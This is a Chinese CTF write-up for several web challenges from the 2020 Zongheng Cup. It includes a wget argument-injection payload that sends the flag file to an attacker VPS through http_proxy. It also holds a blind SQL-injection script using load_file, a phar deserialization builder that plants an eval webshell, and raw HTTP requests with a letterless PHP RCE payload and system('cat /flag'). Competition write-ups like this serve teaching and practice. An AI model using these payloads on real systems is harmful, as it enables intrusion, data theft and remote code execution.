CTF | 4分钟
纵横杯网络安全竞赛Writeup
十二月 27, 2020
CMS WEB 命令注入 渗透

magic_download

run.sh

php
 1#!/bin/bash
 2ulimit -c 0      # core dump size (kb)
 3ulimit -t 60     # max cpu using (s/min)
 4ulimit -u 1500    # max number of process
 5ulimit -m 512000 # max memory (kb)
 6
 7cd /home/ctf
 8stdbuf -oL echo -n "Please enter your IP:"
 9read IP
10echo $IP|grep "^[0-9\.]\{7,15\}$" > /dev/null
11if [ $? -ne 0 ]
12then
13    stdbuf -oL echo "Please input a IP!"
14else
15    exec /home/ctf/wget -P /tmp $IP
16fi

这个正则可以被换行绕过,请看演示:

然后就是利用 wget 的各种参数,把 flag 给传出去。可以给 wget 设置 http_proxy,正好可以用 http_proxy 带出 flag,设置 http 代理为攻击者 vps,然后监听 80 端口就完事了

php
1-e http_proxy=vps --method=POST --body-file=/home/ctf/flag --header=X-Powered-By:Y1ng \\n127.0.0.1

easyci

username 存在注入 可以 load_file 读文件 读 Apache 站点配置文件得到网站的根目录

python
 1#!/usr/bin/env python3
 2#-*- coding:utf-8 -*-
 3#__author__: 颖奇L'Amore www.gem-love.com
 4
 5import requests
 6import time
 7from urllib.parse import quote
 8from base64 import b64decode
 9
10url = "http://your_docker.cloudeci1.ichunqiu.com/public/index.php/home/login"
11data = {"username" : "", "password" : "y1ng"}
12result = ""
13
14payload = 'select database()'
15payload = 'password' #c3762483bc73d0b7943156d43911ce38
16payload = 'select to_base64(substr((load_file("/etc/apache2/sites-enabled/000-default.conf")),596,650))' #/var/sercet/html   然后sqlmap的os-shell一把梭
17
18
19for i in range(1,10000):
20    time.sleep(0.06)
21    low = 32
22    high =128
23    mid = (low+high)//2
24    while(low<high):
25        data["username"] = "0'or (ascii(substr((%s),%d,1)))>%d#" %(payload, i,mid)
26        # print(data)
27        r = requests.post(url, data)
28        # print(r.text)
29        if "用户名"  not in r.text:
30            low = mid+1
31        else:
32            high = mid
33        mid =(low+high)//2
34    if(mid == 32 or mid == 127):
35        break
36    result +=chr(mid)
37    print(result)
38    try:
39        print(b64decode(result.encode()).decode())
40    except:
41        pass

根目录是 /var/sercet/html 然后 sqlmap 的–os-shell 一把梭就完了

easycms

www.zip 拿到源码,config.php 拿到数据库的账号密码 admin/admin868 并用这个密码也一并进了后台

然后用这个 SSRF 的洞读 /flag 即可:https://github.com/yzmcms/yzmcms/issues/53

hello php

www.zip 拿到源码,一个简单的 phar 反序列化

php
 1<?php
 2class Config{
 3    public $title;
 4    public $comment;
 5    public $logo_url;
 6    public function __construct($title,$comment,$logo_url){
 7        $this->title= $title;
 8        $this->comment = $comment;
 9        $this->logo_url = $logo_url;
10    }
11}
12$c = new Config("';echo('shell');eval(\$_POST['0']);//",'123','123');
13@unlink("phar.jpg");
14$phar = new Phar("phar.phar");
15$phar->startBuffering();
16$phar->setStub("<?php __HALT_COMPILER(); ?>");
17$phar->setMetadata($c);
18$phar->addFromString("test.txt", "test");
19$phar->stopBuffering();
20@rename("phar.phar","phar.jpg");
21?>

上传的文件名是时间戳的 md5,没有回显,写个脚本找一下:

python
 1#!/usr/bin/env python3
 2#-*- coding:utf-8 -*-
 3import time
 4import requests as req 
 5import hashlib
 6def md5(s):
 7	return hashlib.md5(s.encode()).hexdigest()
 8
 9for i in range(100):
10	url = f"http://eci-2zeb3stdvqw9aed67js3.cloudeci1.ichunqiu.com/static/{md5(str(int(time.time())))}.jpg"
11	r = req.get(url)
12	if r.status_code == 200:
13		print(url)
14		break
15	else:
16		print(i, r.status_code)
17	time.sleep(1)

index.php 触发 phar 反序列化即可把马写入 config.php

php
1/?img=phar:///var/www/html/static/67d9c71da5d4926c0f3433659c0690fd.jpg

大家一起来审代码

参考 https://www.freebuf.com/vuls/241106.html

进入后台 admin/123456。找到 adm1n/admin_weixin.php,利用无字母数字 RCE 即可

php
 1POST /adm1n/admin_weixin.php?action=set HTTP/1.1
 2Host: eci-2ze9eefnhrp2znd5q2ia.cloudeci1.ichunqiu.com
 3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
 4Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 5Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 6Accept-Encoding: gzip, deflate
 7Content-Type: application/x-www-form-urlencoded
 8Content-Length: 1265
 9Connection: close
10Referer: http://eci-2ze9eefnhrp2znd5q2ia.cloudeci1.ichunqiu.com/adm1n/admin_weixin.php
11Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1608027846,1608659573,1608962046; UM_distinctid=1745809b7eda-0b8fe367096bfd8-4c312d7d-1fa400-1745809b7ee40; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1608966210; __jsluid_h=82317a29492d0410972d5c3b5bb35543; PHPSESSID=9d513712218467c2e573a918f8b8d725; __tins__21018907=%7B%22sid%22%3A%201608966619441%2C%20%22vd%22%3A%202%2C%20%22expires%22%3A%201608968423945%7D; __51cke__=; __51laig__=2
12Upgrade-Insecure-Requests: 1
13isopen=n&url=https%3A%2F%2Fwww.seacms.net&title=%E6%B5%B7%E6%B4%8B%E5%BD%B1%E8%A7%86&ckmov_url=https%3A%2F%2Fwww.seacms.net%2Fvip.php%3Furl%3D+&dpic=https%3A%2F%2Fwww.seacms.net%2Fapi%2Fwx.jpg&follow=%E6%84%9F%E8%B0%A2%E6%82%A8%E7%9A%84%E5%85%B3%E6%B3%A8%E3%80%82&noc=%E6%9A%82%E6%97%A0%E4%BD%A0%E8%A6%81%E7%9A%84%E5%86%85%E5%AE%B9%E3%80%82&help=%E8%BF%99%E6%98%AF%E5%B8%AE%E5%8A%A9%E4%BF%A1%E6%81%AF%E3%80%82&topage=d&dwz=n&dwztoken=dwztoken&sql_num=15&msg1a=%E5%85%B3%E9%94%AE%E8%AF%8D1&msg1b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B91&msg2a=%E5%85%B3%E9%94%AE%E8%AF%8D2&msg2b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B92%3Ca+href%3D%27http%3A%2F%2Fwww.seacms.net%27%3E%E9%93%BE%E6%8E%A5%E6%B5%8B%E8%AF%95%3C%2Fa%3E%EF%BC%8C%E6%B5%8B%E8%AF%95%E7%BB%93%E6%9D%9F%E3%80%82&msg3a=%E5%85%B3%E9%94%AE%E8%AF%8D3&msg3b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B93&msg4a=%E5%85%B3%E9%94%AE%E8%AF%8D4&msg4b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B94&msg5a=%E5%85%B3%E9%94%AE%E8%AF%8D5&msg5b=1231");$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');$___=$$__;$_($___[_]);//
php
 1POST /data/admin/weixin.php HTTP/1.1
 2Host: eci-2ze9eefnhrp2znd5q2ia.cloudeci1.ichunqiu.com
 3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
 4Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 5Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 6Accept-Encoding: gzip, deflate
 7Connection: close
 8Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1608027846,1608659573,1608962046; UM_distinctid=1745809b7eda-0b8fe367096bfd8-4c312d7d-1fa400-1745809b7ee40; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1608966210; __jsluid_h=82317a29492d0410972d5c3b5bb35543; PHPSESSID=9d513712218467c2e573a918f8b8d725; __tins__21018907=%7B%22sid%22%3A%201608966619441%2C%20%22vd%22%3A%202%2C%20%22expires%22%3A%201608968423945%7D; __51cke__=; __51laig__=2
 9Upgrade-Insecure-Requests: 1
10Cache-Control: max-age=0
11Content-Type: application/x-www-form-urlencoded
12Content-Length: 22
13_=system("cat /flag");